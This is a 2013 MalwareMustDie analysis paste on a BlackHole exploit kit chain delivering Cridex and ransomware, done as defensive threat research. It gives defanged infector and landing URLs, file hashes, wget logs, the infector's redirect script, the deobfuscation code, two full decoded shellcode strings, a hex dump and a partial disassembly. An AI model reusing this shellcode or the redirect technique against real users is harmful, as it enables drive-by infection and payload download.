SHARE
TWEET

#MMD - BlackHole EK w/GeoIP Double infector(Cridex+Ransomer)

MalwareMustDie Feb 18th, 2013 774 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. ===================================================
  2. #MalwareMustDie!
  3. BlackHole Exploit Kit with Double infector:
  4. Cridex & FakeAV/Ransomer (depends on your request IP)
  5. Infector: h00p://webworks.investorship.co.jp/page-329.htm
  6. Landing page/BHEK: h00p://46.175.224.21:8080/forum/links/public_version.php
  7. All of the cracked infectors download urls:
  8. //JARS
  9. ..using the applet in the same url as landing page (2 JARS found)
  10. //PDF:
  11. h00p://46.175.224.21:8080/forum/links/public_version.php?tzpiqxci=1h:1j:1j:32:1f&rqoddrzb=2w:3d:30&gejepm=1j:33:32:1l:1g:1i:1o:1n:1o:1i&ifsrn=1k:1d:1f:1d:1g:1d:1f
  12. h00p://46.175.224.21:8080/forum/links/public_version.php?iitxovwc=1h:1j:1j:32:1f&hic=30&ztm=1j:33:32:1l:1g:1i:1o:1n:1o:1i&dremyj=1k:1d:1f:1d:1g:1d:1f
  13. h00p://46.175.224.21:8080/forum/links/public_version.php?hysb=30:1n:1i:1i:33&togkor=3c:3m:3h&wafox=2v:1k:1m:32:33:1k:1k:31:1j:1o&wdnxc=1k:1d:1f:1d:1g:1d:1f
  14. h00p://46.175.224.21:8080/forum/links/public_version.php?myedivup=30:1n:1i:1i:33&gtaaynbu=35&kxqcms=2v:1k:1m:32:33:1k:1k:31:1j:1o&oiqkk=1k:1d:1f:1d:1g:1d:1f
  15. //SWF
  16. h00p://46.175.224.21:8080/forum/links/public_version.php?jwio=1h:1j:1j:32:1f&xnrj=3b:3l:37:3a:3k&ehn=1j:33:32:1l:1g:1i:1o:1n:1o:1i&fxqbltpx=cbfyrfg
  17. h00p://46.175.224.21:8080/forum/links/public_version.php?ecxrx=1h:1j:1j:32:1f&pihpkcv=3h:39:36:39&tlouh=1j:33:32:1l:1g:1i:1o:1n:1o:1i&cuchmcv=bda
  18. h00p://46.175.224.21:8080/forum/links/public_version.php?jsehhtfz=30:1n:1i:1i:33&rrhjmwf=32:3c:3a:3g:3d&ggrjtm=2v:1k:1m:32:33:1k:1k:31:1j:1o&vpx=mcms
  19. h00p://46.175.224.21:8080/forum/links/public_version.php?efoo=30:1n:1i:1i:33&bpsmrsqj=3k:31:3f:35&sokgxr=2v:1k:1m:32:33:1k:1k:31:1j:1o&engay=zhpldpx
  20. //Payloads:
  21. h00p://46.175.224.21:8080/forum/links/public_version.php?nf=1h:1j:1j:32:1f&je=1j:33:32:1l:1g:1i:1o:1n:1o:1i&t=1k&oy=p&jh=i
  22. h00p://46.175.224.21:8080/forum/links/public_version.php?tf=30:1n:1i:1i:33&we=2v:1k:1m:32:33:1k:1k:31:1j:1o&q=1k&mh=p&vv=r
  23.  
  24. The catches:
  25. --------------
  26. 2013/02/18  15:08 2e9e095f7f276c495a0080b656e81d72   94,208 about.exe
  27. 2013/02/18  15:54 80930719764cb6c41840156800ee54f9    7,981 flash1.swf
  28. 2013/02/18  15:57 46dd4ea1cdb58bb38488cfbddf40a7cd    1,030 flash2.swf
  29. 2013/02/18  15:55 80930719764cb6c41840156800ee54f9    7,981 flash3.swf
  30. 2013/02/18  15:57 46dd4ea1cdb58bb38488cfbddf40a7cd    1,030 flash4.swf
  31. 2013/02/18  14:31 04022dd9cb3b5c236ec1e0e07d1a6ec1   13,873 java1.jar
  32. 2013/02/18  14:33 36df7f936b42abe2ccff75544f08f9f2   12,968 java2.jar
  33. 2013/02/18  13:54 96c6c9a9346a360d07236d5bd021adc1      434 page-329.htm
  34. 2013/02/18  15:50 6cfb52ab36855801313742a90593c6ec   20,161 pdf1.pdf
  35. 2013/02/18  15:50 40e02231bf9ffe321289cccae0191fd4   11,194 pdf2.pdf
  36. 2013/02/18  15:51 a57fcffb1040048e63b9f81b6ec096bf   20,161 pdf3.pdf
  37. 2013/02/18  15:52 df86cbbc78748287e62be9a1248711ea   11,160 pdf4.pdf
  38. 2013/02/18  14:13 b5de89429d354f138d59673e88907b3b  118,326 public_version-2..php
  39. 2013/02/18  14:16 a5acd12a633e01d575976de4423b8642  118,301 public_version.php
  40. 2013/02/18  15:08 04e9d4167c9a1b82e622e04ad85f8e99  279,040 readme.exe
  41. -----
  42. Total: 2 SWF, 4 PDF, 2 Jars, 2 Payloads
  43.  
  44. Infector found by @Hulk_Crusader, followed: @unixfreaxjp, GeoIP analysis: @it4sec
  45. =================================================================
  46.  
  47. // infector:
  48.  
  49. h00p://webworks.investorship.co.jp/page-329.htm
  50.  
  51. --2013-02-18 14:11:12--  h00p://webworks.investorship.co.jp/page-329.htm
  52. Resolving webworks.investorship.co.jp... seconds 0.00, 117.20.100.110
  53. Caching webworks.investorship.co.jp => 117.20.100.110
  54. Connecting to webworks.investorship.co.jp|117.20.100.110|:80... seconds 0.00, connected.
  55.   :
  56. GET /page-329.htm h00p/1.0
  57. Host: webworks.investorship.co.jp
  58. h00p request sent, awaiting response...
  59.   :
  60. h00p/1.1 200 OK
  61. Date: Mon, 18 Feb 2013 05:11:05 GMT
  62. Server: Apache
  63. Last-Modified: Mon, 18 Feb 2013 04:54:14 GMT
  64. ETag: "1185062d-1b2-5121b3f6"
  65. Accept-Ranges: bytes
  66. Content-Length: 434
  67. Connection: close
  68. Content-Type: text/html
  69.   :
  70. 200 OK
  71. Length: 434 [text/html]
  72. Saving to: `page-329.htm'
  73. 2013-02-18 14:11:12 (9.15 MB/s) - `page-329.htm' saved [434/434]
  74.  
  75.  
  76. //-------cat---------------
  77.  
  78. <html>
  79.  <head>
  80.   <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
  81. <title>Please wait</title>
  82.  </head>
  83.  <body>  
  84. <h1><b>Please wait a moment ... You will be forwarded... </h1></b>
  85. <h4>Internet Explorer / Mozilla Firefox compatible only</h4><br>
  86.  
  87.  
  88. <script>
  89. var1=49;
  90. var2=var1;
  91. if(var1==var2) {document.location="h00p://46.175.224.21:8080/forum/links/public_version.php";}
  92. </script>
  93.  
  94.  
  95. </body>
  96. </html>
  97.  
  98. // -----------landing page/is a BHEK moronz.----------------------
  99.  
  100.  
  101. --2013-02-18 14:13:40--  h00p://46.175.224.21:8080/forum/links/public_version.php
  102. seconds 0.00, Connecting to 46.175.224.21:8080... seconds 0.00, connected.
  103.    :
  104. GET /forum/links/public_version.php http/1.0
  105. Referer: h00p://webworks.investorship.co.jp/page-329.htm
  106. Host: 46.175.224.21:8080
  107. http request sent, awaiting response...
  108.   :
  109. Server: nginx/1.0.10
  110. Date: Mon, 18 Feb 2013 05:13:34 GMT
  111. Content-Type: text/html; charset=CP-1251
  112. Connection: keep-alive
  113. X-Powered-By: PHP/5.3.18-1~dotdeb.0
  114. Vary: Accept-Encoding
  115.  
  116. http/1.1 200 OK
  117. Server: nginx/1.0.10
  118. Date: Mon, 18 Feb 2013 05:16:04 GMT
  119. Content-Type: text/html; charset=CP-1251
  120. Connection: close
  121. X-Powered-By: PHP/5.3.18-1~dotdeb.0
  122. Vary: Accept-Encoding
  123. 200 OK
  124. Length: unspecified [text/html]
  125. Saving to: `public_version.php'
  126. 2013-02-18 14:16:13 (95.7 KB/s) - `public_version.php' saved [118301]
  127.  
  128.  
  129. // -----------------checks the jars..---------------------
  130.  
  131.  
  132. // get java old....
  133.  
  134. --2013-02-18 14:31:39--  h00p://46.175.224.21:8080/forum/links/public_version.php
  135. seconds 0.00, Connecting to 46.175.224.21:8080... seconds 0.00, connected.
  136.   :
  137. GET /forum/links/public_version.php http/1.0
  138. User-Agent: Java/1.6.0_23
  139. Host: 46.175.224.21:8080
  140. h00p request sent, awaiting response...
  141.   :
  142. h00p/1.1 200 OK
  143. Server: nginx/1.0.10
  144. Date: Mon, 18 Feb 2013 05:31:33 GMT
  145. Content-Type: application/java-archive
  146. Connection: keep-alive
  147. X-Powered-By: PHP/5.3.18-1~dotdeb.0
  148. Content-Length: 13873
  149. ETag: "04022dd9cb3b5c236ec1e0e07d1a6ec1"
  150. Last-Modified: Mon, 18 Feb 2013 05:31:33 GMT
  151. Accept-Ranges: bytes
  152.   :
  153. 200 OK
  154. Length: 13873 (14K) [application/java-archive]
  155. Saving to: `java1.jar'
  156. 2013-02-18 14:31:41 (21.7 KB/s) - `java1.jar' saved [13873/13873]
  157.  
  158.  
  159. // get java newer...
  160.  
  161. --2013-02-18 14:33:22--  h00p://46.175.224.21:8080/forum/links/public_version.php
  162. seconds 0.00, Connecting to 46.175.224.21:8080... seconds 0.00, connected.
  163.   :
  164. GET /forum/links/public_version.php http/1.0
  165. User-Agent: Java/1.7.0_09
  166. Host: 46.175.224.21:8080
  167. h00p request sent, awaiting response...
  168.   :
  169. h00p/1.1 200 OK
  170. Server: nginx/1.0.10
  171. Date: Mon, 18 Feb 2013 05:33:15 GMT
  172. Content-Type: application/java-archive
  173. Connection: keep-alive
  174. X-Powered-By: PHP/5.3.18-1~dotdeb.0
  175. Content-Length: 12968
  176. ETag: "36df7f936b42abe2ccff75544f08f9f2"
  177. Last-Modified: Mon, 18 Feb 2013 05:33:15 GMT
  178. Accept-Ranges: bytes
  179.   :
  180. 200 OK
  181. Length: 12968 (13K) [application/java-archive]
  182. Saving to: `./java2.jar'
  183. 2013-02-18 14:33:23 (41.0 KB/s) - `./java2.jar' saved [12968/12968]
  184.  
  185.  
  186. // -------------------------------------------------------
  187.  
  188. // see both plugin-detects....
  189. // it has different shellcodes... two payloads...
  190. // has 2 PDF, 2 SWF, 2 JARS each payload
  191. // PD1.txt      : http://pastebin.com/raw.php?i=CpRXS5m3
  192. // and PD2.txt  : http://pastebin.com/raw.php?i=MkYVRz4R
  193. // ==========================================================================
  194.  
  195. // ========================================
  196. // get the deobs + crack both shellcodes:
  197. // ========================================
  198.  
  199. var a = "8200!%1482!%0451!%e024!%5185!%7415!%34e0!%5191!%e0c5!%9114!%7421!%2191!%9164!%7421!%2191!%9114!%f421!%2191!%9144!%a121!%21b1!%b1b1!%2421!%5191!%24d4!%e4e0!%2191!%b1a1!%2421!%2191!%9124!%0421!%5191!%64e4!%8571!%8504!%6460!%1474!%a5b5!%e5d4!%b477!%4414!%d5a4!%7085!%34b5!%1464!%7044!%d554!%74a5!%70e4!%0181!%0181!%9121!%60a1!%a1c1!%60a1!%f1d1!%6091!%c1e1!%7070!%8521!%c5c5!%8504!%2370!%15e1!%eee6!%3733!%2e2a!%59b1!%7492!%621a!%6d2a!%4c0b!%6662!%7d6a!%6d7d!%0c4b!%e702!%6d7d!%8224!%ce24!%82d5!%8a71!%2df6!%82d5!%8a71!%b3f6!%a23c!%423c!%babe!%e7c2!%b77d!%3c42!%82ba!%c224!%7de7!%82b7!%e324!%8ed5!%c3da!%7de7!%2482!%b7f7!%2482!%2482!%9697!%53c2!%0ac6!%c281!%2a9e!%8217!%5312!%eec6!%4444!%60c4!%53d2!%fec6!%a4c5!%f585!%5382!%fec6!%1e97!%0cb1!%423a!%7de7!%8282!%0d82!%b704!%b580!%8050!%c002!%fec6!%b1a1!%e5a5!%c0c2!%fec6!%f4b5!%a5d4!%c2c0!%42fe!%47c0!%825a!%9282!%4cc2!%a59a!%a23c!%7d3c!%7d7d!%0c94!%3a0c!%ce02!%e3ba!%c77d!%4454!%d5a5!%8204!%6482!%0474!%7dbc!%bed2!%83ba!%3a67!%3a4c!%87d7!%8e13!%87ba!%8282!%7d82!%8604!%8724!%8207!%8282!%0c82!%ac1d!%7d7d!%0b7d!%170c!%24d2!%3afd!%0402!%bd3a!%eb3c!%c5b2!%42b1!%8a55!%0480!%583a!%3cb7!%17be!%3867!%b2de!%c23a!%5f3a!%0fb2!%423a!%c7c0!%4c7d!%5ae6!%4236!%e43a!%b25f!%67c0!%673a!%d5ec!%3173!%3c9d!%2f86!%52b2!%9e3e!%c502!%01ad!%6983!%3f72!%deb1!%58b2!%964d!%1e16!%ddb1!%80b2!%3ae5!%dde7!%05b2!%c5d1!%413a!%3ad5!%97e7!%3c46!%971c!%ccd5!%c0da!%fac1!%d53d!%11e2!%bee6!%8681!%093a!%7d7d!%d383!%9a6c!%b140!%b2c5!%6741!%e43a!%b13f!%e502!%e73a!%8543!%423a!%3a86!%8681!%c43a!%b18e!%1c77!%d5c1!%dacc!%ffff!%beff!%508e!%afbe!%042e!%0382!%ef08!%9e30!%6618!%139c!%0185!%cfbe!%4ecf!%6638!%1414!%1414!%".split("").reverse().join("");
  200. var xxx=  a["replace"](/\%!/g, "%" + "u");
  201. document.write(xxx);
  202.  
  203. var b = "8200!%a582!%e551!%e0e5!%5185!%5404!%34e0!%5191!%e095!%9174!%2421!%2191!%b191!%3421!%2191!%9134!%b121!%21b1!%b1a1!%5421!%2191!%9134!%e521!%51a1!%f5d4!%b1e0!%21b1!%9114!%1421!%2191!%9164!%8121!%51b1!%c5e4!%8571!%8504!%6460!%1474!%a5b5!%e5d4!%b477!%4414!%d5a4!%7085!%34b5!%1464!%7044!%d554!%74a5!%70e4!%0181!%0181!%9121!%60a1!%a1c1!%60a1!%f1d1!%6091!%c1e1!%7070!%8521!%c5c5!%8504!%2370!%15e1!%eee6!%3733!%2e2a!%59b1!%7492!%621a!%6d2a!%4c0b!%6662!%7d6a!%6d7d!%0c4b!%e702!%6d7d!%8224!%ce24!%82d5!%8a71!%2df6!%82d5!%8a71!%b3f6!%a23c!%423c!%babe!%e7c2!%b77d!%3c42!%82ba!%c224!%7de7!%82b7!%e324!%8ed5!%c3da!%7de7!%2482!%b7f7!%2482!%2482!%9697!%53c2!%0ac6!%c281!%2a9e!%8217!%5312!%eec6!%4444!%60c4!%53d2!%fec6!%a4c5!%f585!%5382!%fec6!%1e97!%0cb1!%423a!%7de7!%8282!%0d82!%b704!%b580!%8050!%c002!%fec6!%b1a1!%e5a5!%c0c2!%fec6!%f4b5!%a5d4!%c2c0!%42fe!%47c0!%825a!%9282!%4cc2!%a59a!%a23c!%7d3c!%7d7d!%0c94!%3a0c!%ce02!%e3ba!%c77d!%4454!%d5a5!%8204!%6482!%0474!%7dbc!%bed2!%83ba!%3a67!%3a4c!%87d7!%8e13!%87ba!%8282!%7d82!%8604!%8724!%8207!%8282!%0c82!%ac1d!%7d7d!%0b7d!%170c!%24d2!%3afd!%0402!%bd3a!%eb3c!%c5b2!%42b1!%8a55!%0480!%583a!%3cb7!%17be!%3867!%b2de!%c23a!%5f3a!%0fb2!%423a!%c7c0!%4c7d!%5ae6!%4236!%e43a!%b25f!%67c0!%673a!%d5ec!%3173!%3c9d!%2f86!%52b2!%9e3e!%c502!%01ad!%6983!%3f72!%deb1!%58b2!%964d!%1e16!%ddb1!%80b2!%3ae5!%dde7!%05b2!%c5d1!%413a!%3ad5!%97e7!%3c46!%971c!%ccd5!%c0da!%fac1!%d53d!%11e2!%bee6!%8681!%093a!%7d7d!%d383!%9a6c!%b140!%b2c5!%6741!%e43a!%b13f!%e502!%e73a!%8543!%423a!%3a86!%8681!%c43a!%b18e!%1c77!%d5c1!%dacc!%ffff!%beff!%508e!%afbe!%042e!%0382!%ef08!%9e30!%6618!%139c!%0185!%cfbe!%4ecf!%6638!%1414!%1414!%".split("").reverse().join("");
  204. var yyy=  b["replace"](/\%!/g, "%" + "u");
  205. document.write("\n\n"+yyy);
  206.  
  207. // output:
  208.  
  209. %u4141%u4141%u8366%ufce4%uebfc%u5810%uc931%u8166%u03e9%u80fe%u2830%ue240%uebfa%ue805%uffeb%uffff%uccad%u1c5d%u77c1%ue81b%ua34c%u1868%u68a3%ua324%u3458%ua37e%u205e%uf31b%ua34e%u1476%u5c2b%u041b%uc6a9%u383d%ud7d7%ua390%u1868%u6eeb%u2e11%ud35d%u1caf%uad0c%u5dcc%uc179%u64c3%u7e79%u5da3%ua314%u1d5c%u2b50%u7edd%u5ea3%u2b08%u1bdd%u61e1%ud469%u2b85%u1bed%u27f3%u3896%uda10%u205c%ue3e9%u2b25%u68f2%ud9c3%u3713%uce5d%ua376%u0c76%uf52b%ua34e%u6324%u6ea5%ud7c4%u0c7c%ua324%u2bf0%ua3f5%ua32c%ued2b%u7683%ueb71%u7bc3%ua385%u0840%u55a8%u1b24%u2b5c%uc3be%ua3db%u2040%udfa3%u2d42%uc071%ud7b0%ud7d7%ud1ca%u28c0%u2828%u7028%u4278%u4068%u28d7%u2828%uab78%u31e8%u7d78%uc4a3%u76a3%uab38%u2deb%ucbd7%u4740%u2846%u4028%u5a5d%u4544%ud77c%uab3e%u20ec%uc0a3%u49c0%ud7d7%uc3d7%uc32a%ua95a%u2cc4%u2829%ua528%u0c74%uef24%u0c2c%u4d5a%u5b4f%u6cef%u2c0c%u5a5e%u1a1b%u6cef%u200c%u0508%u085b%u407b%u28d0%u2828%u7ed7%ua324%u1bc0%u79e1%u6cef%u2835%u585f%u5c4a%u6cef%u2d35%u4c06%u4444%u6cee%u2135%u7128%ue9a2%u182c%u6ca0%u2c35%u7969%u2842%u2842%u7f7b%u2842%u7ed7%uad3c%u5de8%u423e%u7b28%u7ed7%u422c%uab28%u24c3%ud77b%u2c7e%uebab%uc324%uc32a%u6f3b%u17a8%u5d28%u6fd2%u17a8%u5d28%u42ec%u4228%ud7d6%u207e%ub4c0%ud7d6%ua6d7%u2666%ub0c4%ua2d6%ua126%u2947%u1b95%ua2e2%u3373%u6eee%u1e51%u0732%u4058%u5c5c%u1258%u0707%u1e1c%u1906%u1d1f%u1a06%u1c1a%u1a06%u1219%u1810%u1810%u4e07%u5a47%u455d%u4407%u4641%u5b43%u5807%u4a5d%u4144%u774b%u4d5e%u5b5a%u4741%u0646%u4058%u1758%u4e46%u1915%u1240%u4219%u1912%u1242%u1a1b%u1912%u0e4e%u4d42%u1915%u1242%u1b1b%u1b12%u121a%u4419%u1912%u124f%u4119%u1912%u1247%u4619%u1912%u1247%u4119%u5c0e%u1915%u0e43%u5147%u5815%u420e%u1540%u2841%u0028
  210.  
  211. %u4141%u4141%u8366%ufce4%uebfc%u5810%uc931%u8166%u03e9%u80fe%u2830%ue240%uebfa%ue805%uffeb%uffff%uccad%u1c5d%u77c1%ue81b%ua34c%u1868%u68a3%ua324%u3458%ua37e%u205e%uf31b%ua34e%u1476%u5c2b%u041b%uc6a9%u383d%ud7d7%ua390%u1868%u6eeb%u2e11%ud35d%u1caf%uad0c%u5dcc%uc179%u64c3%u7e79%u5da3%ua314%u1d5c%u2b50%u7edd%u5ea3%u2b08%u1bdd%u61e1%ud469%u2b85%u1bed%u27f3%u3896%uda10%u205c%ue3e9%u2b25%u68f2%ud9c3%u3713%uce5d%ua376%u0c76%uf52b%ua34e%u6324%u6ea5%ud7c4%u0c7c%ua324%u2bf0%ua3f5%ua32c%ued2b%u7683%ueb71%u7bc3%ua385%u0840%u55a8%u1b24%u2b5c%uc3be%ua3db%u2040%udfa3%u2d42%uc071%ud7b0%ud7d7%ud1ca%u28c0%u2828%u7028%u4278%u4068%u28d7%u2828%uab78%u31e8%u7d78%uc4a3%u76a3%uab38%u2deb%ucbd7%u4740%u2846%u4028%u5a5d%u4544%ud77c%uab3e%u20ec%uc0a3%u49c0%ud7d7%uc3d7%uc32a%ua95a%u2cc4%u2829%ua528%u0c74%uef24%u0c2c%u4d5a%u5b4f%u6cef%u2c0c%u5a5e%u1a1b%u6cef%u200c%u0508%u085b%u407b%u28d0%u2828%u7ed7%ua324%u1bc0%u79e1%u6cef%u2835%u585f%u5c4a%u6cef%u2d35%u4c06%u4444%u6cee%u2135%u7128%ue9a2%u182c%u6ca0%u2c35%u7969%u2842%u2842%u7f7b%u2842%u7ed7%uad3c%u5de8%u423e%u7b28%u7ed7%u422c%uab28%u24c3%ud77b%u2c7e%uebab%uc324%uc32a%u6f3b%u17a8%u5d28%u6fd2%u17a8%u5d28%u42ec%u4228%ud7d6%u207e%ub4c0%ud7d6%ua6d7%u2666%ub0c4%ua2d6%ua126%u2947%u1b95%ua2e2%u3373%u6eee%u1e51%u0732%u4058%u5c5c%u1258%u0707%u1e1c%u1906%u1d1f%u1a06%u1c1a%u1a06%u1219%u1810%u1810%u4e07%u5a47%u455d%u4407%u4641%u5b43%u5807%u4a5d%u4144%u774b%u4d5e%u5b5a%u4741%u0646%u4058%u1758%u4e5c%u1b15%u1218%u4619%u1912%u1241%u4119%u1b12%u0e1b%u4d5f%u1a15%u125e%u4319%u1912%u1245%u1a1b%u1b12%u121b%u4319%u1912%u1243%u191b%u1912%u1242%u4719%u590e%u1915%u0e43%u4045%u5815%u5e0e%u155e%u285a%u0028
  212.  
  213.  
  214. // ========================
  215. // shellcode analysis...
  216. // ========================
  217.  
  218. // break the eggs... no text...one time...
  219.  
  220. // raws...
  221. 414141418366fce4ebfc5810c931816603e980fe2830e240ebfae805ffebffffccad1c5d77c1e81ba34c186868a3a3243458a37e205ef31ba34e14765c2b041bc6a9383dd7d7a39018686eeb2e11d35d1cafad0c5dccc17964c37e795da3a3141d5c2b507edd5ea32b081bdd61e1d4692b851bed27f33896da10205ce3e92b2568f2d9c33713ce5da3760c76f52ba34e63246ea5d7c40c7ca3242bf0a3f5a32ced2b7683eb717bc3a385084055a81b242b5cc3bea3db2040dfa32d42c071d7b0d7d7d1ca28c0282870284278406828d72828ab7831e87d78c4a376a3ab382debcbd74740284640285a5d4544d77cab3e20ecc0a349c0d7d7c3d7c32aa95a2cc42829a5280c74ef240c2c4d5a5b4f6cef2c0c5a5e1a1b6cef200c0508085b407b28d028287ed7a3241bc079e16cef2835585f5c4a6cef2d354c0644446cee21357128e9a2182c6ca02c357969284228427f7b28427ed7ad3c5de8423e7b287ed7422cab2824c3d77b2c7eebabc324c32a6f3b17a85d286fd217a85d2842ec4228d7d6207eb4c0d7d6a6d72666b0c4a2d6a12629471b95a2e233736eee1e51073240585c5c125807071e1c19061d1f1a061c1a1a061219181018104e075a47455d440746415b4358074a5d4144774b4d5e5b5a47410646405817584e46191512404219191212421a1b19120e4e4d42191512421b1b1b12121a44191912124f41191912124746191912124741195c0e19150e4351475815420e154028410028
  222.  
  223. // view...
  224. 41 41 41 41 66 83 e4 fc  fc eb 10 58 31 c9 66 81  AAAAf......X1.f.
  225. e9 03 fe 80 30 28 40 e2  fa eb 05 e8 eb ff ff ff  ....0(@.........
  226. ad cc 5d 1c c1 77 1b e8  4c a3 68 18 a3 68 24 a3  ..]..w..L.h..h$.
  227. 58 34 7e a3 5e 20 1b f3  4e a3 76 14 2b 5c 1b 04  X4~.^...N.v.+\..
  228. a9 c6 3d 38 d7 d7 90 a3  68 18 eb 6e 11 2e 5d d3  ..=8....h..n..].
  229. af 1c 0c ad cc 5d 79 c1  c3 64 79 7e a3 5d 14 a3  .....]y..dy~.]..
  230. 5c 1d 50 2b dd 7e a3 5e  08 2b dd 1b e1 61 69 d4  \.P+.~.^.+...ai.
  231. 85 2b ed 1b f3 27 96 38  10 da 5c 20 e9 e3 25 2b  .+...'.8..\...%+
  232. f2 68 c3 d9 13 37 5d ce  76 a3 76 0c 2b f5 4e a3  .h...7].v.v.+.N.
  233. 24 63 a5 6e c4 d7 7c 0c  24 a3 f0 2b f5 a3 2c a3  $c.n..|.$..+..,.
  234. 2b ed 83 76 71 eb c3 7b  85 a3 40 08 a8 55 24 1b  +..vq..{..@..U$.
  235. 5c 2b be c3 db a3 40 20  a3 df 42 2d 71 c0 b0 d7  \+....@...B-q...
  236. d7 d7 ca d1 c0 28 28 28  28 70 78 42 68 40 d7 28  .....((((pxBh@.(
  237. 28 28 78 ab e8 31 78 7d  a3 c4 a3 76 38 ab eb 2d  ((x..1x}...v8..-
  238. d7 cb 40 47 46 28 28 40  5d 5a 44 45 7c d7 3e ab  ..@GF((@]ZDE|.>.
  239. ec 20 a3 c0 c0 49 d7 d7  d7 c3 2a c3 5a a9 c4 2c  .....I....*.Z..,
  240. 29 28 28 a5 74 0c 24 ef  2c 0c 5a 4d 4f 5b ef 6c  )((.t.$.,.ZMO[.l
  241. 0c 2c 5e 5a 1b 1a ef 6c  0c 20 08 05 5b 08 7b 40  .,^Z...l....[.{@
  242. d0 28 28 28 d7 7e 24 a3  c0 1b e1 79 ef 6c 35 28  .(((.~$....y.l5(
  243. 5f 58 4a 5c ef 6c 35 2d  06 4c 44 44 ee 6c 35 21  _XJ\.l5-.LDD.l5!
  244. 28 71 a2 e9 2c 18 a0 6c  35 2c 69 79 42 28 42 28  (q..,..l5,iyB(B(
  245. 7b 7f 42 28 d7 7e 3c ad  e8 5d 3e 42 28 7b d7 7e  {.B(.~<..]>B({.~
  246. 2c 42 28 ab c3 24 7b d7  7e 2c ab eb 24 c3 2a c3  ,B(..${.~,..$.*.
  247. 3b 6f a8 17 28 5d d2 6f  a8 17 28 5d ec 42 28 42  ;o..(].o..(].B(B
  248. d6 d7 7e 20 c0 b4 d6 d7  d7 a6 66 26 c4 b0 d6 a2  ..~.......f&....
  249. 26 a1 47 29 95 1b e2 a2  73 33 ee 6e 51 1e 32 07  &.G)....s3.nQ.2.
  250. 58 40 5c 5c 58 12 07 07  1c 1e 06 19 1f 1d 06 1a  X@\\X...........
  251. 1a 1c 06 1a 19 12 10 18  10 18 07 4e 47 5a 5d 45  ...........NGZ]E
  252. 07 44 41 46 43 5b 07 58  5d 4a 44 41 4b 77 5e 4d  .DAFC[.X]JDAKw^M
  253. 5a 5b 41 47 46 06 58 40  58 17 5c 4e 15 1b 18 12  Z[AGF.X@X.\N....
  254. 19 46 12 19 41 12 19 41  12 1b 1b 0e 5f 4d 15 1a  .F..A..A...._M..
  255. 5e 12 19 43 12 19 45 12  1b 1a 12 1b 1b 12 19 43  ^..C..E........C
  256. 12 19 43 12 1b 19 12 19  42 12 19 47 0e 59 15 19  ..C.....B..G.Y..
  257. 43 0e 45 40 15 58 0e 5e  5e 15 5a 28 28 00        C.E@.X.^^.Z((.  
  258.  
  259. //disasm..
  260. 00000000  41                inc ecx
  261. 00000001  41                inc ecx
  262. 00000002  41                inc ecx
  263. 00000003  41                inc ecx
  264. 00000004  8366FCE4          and dword [esi-0x4],byte -0x1c
  265. 00000008  EBFC              jmp short 0x6 ; loop
  266. 0000000A  58                pop eax
  267. 0000000B  10C9              adc cl,cl
  268. 0000000D  31816603E980      xor [ecx-0x7f16fc9a],eax ; decryption
  269. 00000013  FE                db 0xfe
  270. 00000014  2830              sub [eax],dh ; math
  271. 00000016  E240              loop 0x58 ; loop
  272. 00000018  EBFA              jmp short 0x14 ; loop
  273. 0000001A  E805FFEBFF        call dword 0xffebff24 ; call
  274. 0000001F  FFCC              dec esp
  275. 00000021  AD                lodsd
  276. 00000022  1C5D              sbb al,0x5d
  277. 00000024  77C1              ja 0xffffffe7
  278. 00000026  E81BA34C18        call dword 0x184ca346 ; call
  279. 0000002B  6868A3A324        push dword 0x24a3a368
  280. 00000030  3458              xor al,0x58 ; decryption
  281. 00000032  A37E205EF3        mov [0xf35e207e],eax
  282. 00000037  1BA34E14765C      sbb esp,[ebx+0x5c76144e]
  283. 0000003D  2B041B            sub eax,[ebx+ebx] ; math
  284. 00000040  C6                db 0xc6
  285. 00000041  A9383DD7D7        test eax,0xd7d73d38
  286. 00000046  A39018686E        mov [0x6e681890],eax
  287. 0000004B  EB2E              jmp short 0x7b ; loop
  288. 0000004D  11D3              adc ebx,edx
  289. 0000004F  5D                pop ebp
  290. 00000050  1CAF              sbb al,0xaf
  291. 00000052  AD                lodsd
  292. 00000053  0C5D              or al,0x5d
  293. 00000055  CC                int3
  294. 00000056  C17964C3          sar dword [ecx+0x64],0xc3
  295. 0000005A  7E79              jng 0xd5
  296. 0000005C  5D                pop ebp
  297. 0000005D  A3A3141D5C        mov [0x5c1d14a3],eax
  298. 00000062  2B507E            sub edx,[eax+0x7e] ; math
  299. 00000065  DD5EA3            fstp qword [esi-0x5d]
  300. 00000068  2B08              sub ecx,[eax] ; math
  301. 0000006A  1BDD              sbb ebx,ebp
  302. 0000006C  61                popad
  303. 0000006D  E1D4              loope 0x43
  304. 0000006F  692B851BED27      imul ebp,[ebx],dword 0x27ed1b85
  305. 00000075  F33896DA10205C    rep cmp [esi+0x5c2010da],dl
  306. 0000007C  E3E9              jecxz 0x67
  307. 0000007E  2B2568F2D9C3      sub esp,[dword 0xc3d9f268] ; math
  308. 00000084  37                aaa
  309. 00000085  13CE              adc ecx,esi
  310. 00000087  5D                pop ebp
  311. 00000088  A3760C76F5        mov [0xf5760c76],eax
  312. 0000008D  2BA34E63246E      sub esp,[ebx+0x6e24634e] ; math
  313. 00000093  A5                movsd
  314. 00000094  D7                xlatb
  315. 00000095  C40C7C            les ecx,[esp+edi*2]
  316. 00000098  A3242BF0A3        mov [0xa3f02b24],eax
  317. 0000009D  F5                cmc
  318. 0000009E  A32CED2B76        mov [0x762bed2c],eax
  319. 000000A3  83EB71            sub ebx,byte +0x71 ; math
  320. 000000A6  7BC3              jpo 0x6b
  321. 000000A8  A385084055        mov [0x55400885],eax
  322. 000000AD  A81B              test al,0x1b
  323. 000000AF  242B              and al,0x2b
  324. 000000B1  5C                pop esp
  325. 000000B2  C3                ret
  326. 000000B3  BEA3DB2040        mov esi,0x4020dba3
  327. 000000B8  DFA32D42C071      fbld tword [ebx+0x71c0422d]
  328. 000000BE  D7                xlatb
  329. 000000BF  B0D7              mov al,0xd7
  330. 000000C1  D7                xlatb
  331. 000000C2  D1CA              ror edx,1 ; bitwise cipher
  332. 000000C4  28C0              sub al,al ; math
  333. 000000C6  2828              sub [eax],ch ; math
  334. 000000C8  7028              jo 0xf2
  335. 000000CA  42                inc edx
  336. 000000CB  7840              js 0x10d
  337. 000000CD  6828D72828        push dword 0x2828d728
  338. 000000D2  AB                stosd
  339. 000000D3  7831              js 0x106
  340. 000000D5  E87D78C4A3        call dword 0xa3c47957 ; call
  341. 000000DA  76A3              jna 0x7f
  342. 000000DC  AB                stosd
